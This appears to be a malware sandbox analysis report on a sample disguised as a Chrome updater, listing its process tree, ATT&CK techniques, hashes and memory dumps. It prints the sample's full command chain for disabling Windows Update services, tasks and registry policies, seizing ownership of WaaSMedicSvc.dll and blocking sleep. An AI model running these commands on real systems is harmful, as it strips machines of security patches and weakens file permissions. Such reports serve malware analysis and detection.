C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:1260

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:1056

C:\Windows\system32\sc.exe
sc stop bits
8⤵
PID:1708

C:\Windows\system32\sc.exe
sc stop dosvc
8⤵
PID:900

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:1944

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:864

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:972

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:1696

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:1652

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:608

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:1444

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:1744

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:1540

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:1692

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:1072

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:2044

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1836

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1816

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
8⤵
PID:1660

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
8⤵
PID:1704

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
8⤵
PID:1532

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
8⤵
PID:1708

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
8⤵
PID:576

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
8⤵
PID:1348

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
8⤵
PID:1400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
8⤵
PID:1592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
8⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
8⤵
PID:1248

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
8⤵
PID:1004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
8⤵
PID:852

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
PID:1576

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
7⤵
PID:1288

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "rvmaottuvrwq"
8⤵
PID:1760

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
258534f009540a1b82120c82cd9e697e

SHA1
3243d37c9b3424f261663c7d8b4f8781c3925c8e

SHA256
a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505

SHA512
d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
258534f009540a1b82120c82cd9e697e

SHA1
3243d37c9b3424f261663c7d8b4f8781c3925c8e

SHA256
a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505

SHA512
d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
258534f009540a1b82120c82cd9e697e

SHA1
3243d37c9b3424f261663c7d8b4f8781c3925c8e

SHA256
a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505

SHA512
d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945

Download Submit
memory/240-97-0x0000000000000000-mapping.dmp

Download
memory/268-84-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-83-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-79-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-106-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-81-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-90-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-87-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-86-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-93-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-89-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-78-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/268-91-0x0000000140002348-mapping.dmp

Download
memory/284-284-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/284-281-0x0000000001BD0000-0x0000000001BFA000-memory.dmp

Filesize
168KB

Download
memory/300-280-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/300-279-0x0000000000A30000-0x0000000000A5A000-memory.dmp

Filesize
168KB

Download
memory/372-268-0x00000000004E0000-0x000000000050A000-memory.dmp

Filesize
168KB

Download
memory/372-252-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/420-159-0x0000000000870000-0x000000000089A000-memory.dmp

Filesize
168KB

Download
memory/420-141-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/420-158-0x0000000000370000-0x0000000000393000-memory.dmp

Filesize
140KB

Download
memory/420-138-0x0000000000370000-0x0000000000393000-memory.dmp

Filesize
140KB

Download
memory/420-142-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/464-144-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/464-145-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/464-160-0x00000000000E0000-0x000000000010A000-memory.dmp

Filesize
168KB

Download
memory/480-149-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/480-151-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/480-161-0x0000000000180000-0x00000000001AA000-memory.dmp

Filesize
168KB

Download
memory/488-194-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/488-192-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/488-234-0x0000000000520000-0x000000000054A000-memory.dmp

Filesize
168KB

Download
memory/524-102-0x0000000000000000-mapping.dmp

Download
memory/532-109-0x0000000000000000-mapping.dmp

Download
memory/556-68-0x0000000000000000-mapping.dmp

Download
memory/568-75-0x0000000000000000-mapping.dmp

Download
memory/592-196-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/592-236-0x0000000000430000-0x000000000045A000-memory.dmp

Filesize
168KB

Download
memory/592-197-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/608-188-0x0000000000000000-mapping.dmp

Download
memory/608-115-0x0000000000000000-mapping.dmp

Download
memory/668-270-0x0000000000450000-0x000000000047A000-memory.dmp

Filesize
168KB

Download
memory/668-202-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/668-200-0x000007FEBF4D0000-0x000007FEBF4E0000-memory.dmp

Filesize
64KB

Download
memory/688-153-0x0000000000000000-mapping.dmp

Download
memory/752-272-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/752-271-0x0000000000A20000-0x0000000000A4A000-memory.dmp

Filesize
168KB

Download
memory/768-73-0x0000000000000000-mapping.dmp

Download
memory/808-273-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/808-274-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/820-119-0x0000000000000000-mapping.dmp

Download
memory/824-291-0x0000000000480000-0x00000000004AA000-memory.dmp

Filesize
168KB

Download
memory/840-276-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/840-275-0x00000000009B0000-0x00000000009DA000-memory.dmp

Filesize
168KB

Download
memory/864-178-0x0000000000000000-mapping.dmp

Download
memory/864-112-0x0000000000000000-mapping.dmp

Download
memory/880-277-0x0000000000150000-0x000000000017A000-memory.dmp

Filesize
168KB

Download
memory/880-278-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/896-94-0x0000000000000000-mapping.dmp

Download
memory/900-170-0x0000000000000000-mapping.dmp

Download
memory/940-267-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/940-258-0x00000000007F0000-0x000000000081A000-memory.dmp

Filesize
168KB

Download
memory/972-172-0x0000000000000000-mapping.dmp

Download
memory/1004-98-0x0000000000000000-mapping.dmp

Download
memory/1048-77-0x0000000000000000-mapping.dmp

Download
memory/1056-167-0x0000000000000000-mapping.dmp

Download
memory/1088-282-0x0000000000940000-0x000000000096A000-memory.dmp

Filesize
168KB

Download
memory/1088-283-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/1108-286-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/1108-285-0x0000000001D70000-0x0000000001D9A000-memory.dmp

Filesize
168KB

Download
memory/1128-61-0x000007FEECBB0000-0x000007FEED70D000-memory.dmp

Filesize
11.4MB

Download
memory/1128-62-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1128-63-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/1128-59-0x0000000000000000-mapping.dmp

Download
memory/1192-240-0x0000000001AF0000-0x0000000001B1A000-memory.dmp

Filesize
168KB

Download
memory/1192-243-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/1220-250-0x0000000002710000-0x000000000273A000-memory.dmp

Filesize
168KB

Download
memory/1220-254-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/1260-96-0x0000000000000000-mapping.dmp

Download
memory/1260-165-0x0000000000000000-mapping.dmp

Download
memory/1288-180-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-184-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-182-0x0000000000401BEA-mapping.dmp

Download
memory/1288-181-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-179-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-176-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-174-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-175-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1288-292-0x0000000000250000-0x000000000027A000-memory.dmp

Filesize
168KB

Download
memory/1308-58-0x0000000000000000-mapping.dmp

Download
memory/1352-103-0x0000000000000000-mapping.dmp

Download
memory/1368-72-0x0000000000000000-mapping.dmp

Download
memory/1384-117-0x0000000000000000-mapping.dmp

Download
memory/1392-173-0x0000000000000000-mapping.dmp

Download
memory/1400-65-0x0000000000000000-mapping.dmp

Download
memory/1400-169-0x0000000000000000-mapping.dmp

Download
memory/1444-113-0x0000000000000000-mapping.dmp

Download
memory/1448-163-0x0000000000000000-mapping.dmp

Download
memory/1460-67-0x0000000000000000-mapping.dmp

Download
memory/1520-120-0x0000000000000000-mapping.dmp

Download
memory/1520-128-0x0000000000EA4000-0x0000000000EA7000-memory.dmp

Filesize
12KB

Download
memory/1520-137-0x00000000773A0000-0x00000000774BF000-memory.dmp

Filesize
1.1MB

Download
memory/1520-136-0x00000000774C0000-0x0000000077669000-memory.dmp

Filesize
1.7MB

Download
memory/1520-133-0x0000000000EAB000-0x0000000000ECA000-memory.dmp

Filesize
124KB

Download
memory/1520-124-0x000007FEEC700000-0x000007FEED25D000-memory.dmp

Filesize
11.4MB

Download
memory/1520-126-0x00000000774C0000-0x0000000077669000-memory.dmp

Filesize
1.7MB

Download
memory/1520-127-0x00000000773A0000-0x00000000774BF000-memory.dmp

Filesize
1.1MB

Download
memory/1532-108-0x0000000000000000-mapping.dmp

Download
memory/1536-164-0x0000000000000000-mapping.dmp

Download
memory/1540-71-0x0000000000000000-mapping.dmp

Download
memory/1540-111-0x0000000000000000-mapping.dmp

Download
memory/1568-69-0x0000000000000000-mapping.dmp

Download
memory/1576-166-0x0000000000000000-mapping.dmp

Download
memory/1604-186-0x0000000000000000-mapping.dmp

Download
memory/1608-99-0x0000000000000000-mapping.dmp

Download
memory/1620-66-0x0000000000000000-mapping.dmp

Download
memory/1648-105-0x0000000000000000-mapping.dmp

Download
memory/1652-185-0x0000000000000000-mapping.dmp

Download
memory/1652-116-0x0000000000000000-mapping.dmp

Download
memory/1668-55-0x000000001AF30000-0x000000001B154000-memory.dmp

Filesize
2.1MB

Download
memory/1668-56-0x00000000001A0000-0x00000000003DB000-memory.dmp

Filesize
2.2MB

Download
memory/1668-54-0x000000001B170000-0x000000001B3AC000-memory.dmp

Filesize
2.2MB

Download
memory/1668-57-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

Filesize
8KB

Download
memory/1668-76-0x0000000001E70000-0x0000000001E76000-memory.dmp

Filesize
24KB

Download
memory/1696-187-0x0000000000000000-mapping.dmp

Download
memory/1708-168-0x0000000000000000-mapping.dmp

Download
memory/1708-104-0x0000000000000000-mapping.dmp

Download
memory/1748-64-0x0000000000000000-mapping.dmp

Download
memory/1756-189-0x0000000000000000-mapping.dmp

Download
memory/1760-303-0x0000000001E00000-0x0000000001E2A000-memory.dmp

Filesize
168KB

Download
memory/1760-294-0x0000000000230000-0x0000000000236000-memory.dmp

Filesize
24KB

Download
memory/1760-114-0x0000000000000000-mapping.dmp

Download
memory/1760-302-0x0000000000060000-0x0000000000071000-memory.dmp

Filesize
68KB

Download
memory/1760-293-0x0000000000210000-0x0000000000222000-memory.dmp

Filesize
72KB

Download
memory/1788-261-0x00000000008E0000-0x000000000090A000-memory.dmp

Filesize
168KB

Download
memory/1788-264-0x0000000037500000-0x0000000037510000-memory.dmp

Filesize
64KB

Download
memory/1904-74-0x0000000000000000-mapping.dmp

Download
memory/1944-171-0x0000000000000000-mapping.dmp

Download
memory/1944-107-0x0000000000000000-mapping.dmp

Download
memory/1952-134-0x00000000774C0000-0x0000000077669000-memory.dmp

Filesize
1.7MB

Download
memory/1952-135-0x00000000773A0000-0x00000000774BF000-memory.dmp

Filesize
1.1MB

Download
memory/1952-157-0x00000000774C0000-0x0000000077669000-memory.dmp

Filesize
1.7MB

Download
memory/1952-156-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1952-100-0x0000000000000000-mapping.dmp

Download
memory/1952-269-0x0000000000100000-0x000000000012A000-memory.dmp

Filesize
168KB

Download
memory/1952-129-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1952-130-0x00000001400024C8-mapping.dmp

Download
memory/1952-132-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1956-85-0x0000000000000000-mapping.dmp

Download
memory/1976-110-0x0000000000000000-mapping.dmp

Download
memory/1976-150-0x0000000000000000-mapping.dmp

Download
memory/1996-70-0x0000000000000000-mapping.dmp

Download
memory/2000-118-0x0000000000000000-mapping.dmp

Download
memory/2020-155-0x00000000740E0000-0x000000007468B000-memory.dmp

Filesize
5.7MB

Download
memory/2020-123-0x00000000764C1000-0x00000000764C3000-memory.dmp

Filesize
8KB

Download
memory/2020-121-0x0000000000000000-mapping.dmp

Download
memory/2044-101-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads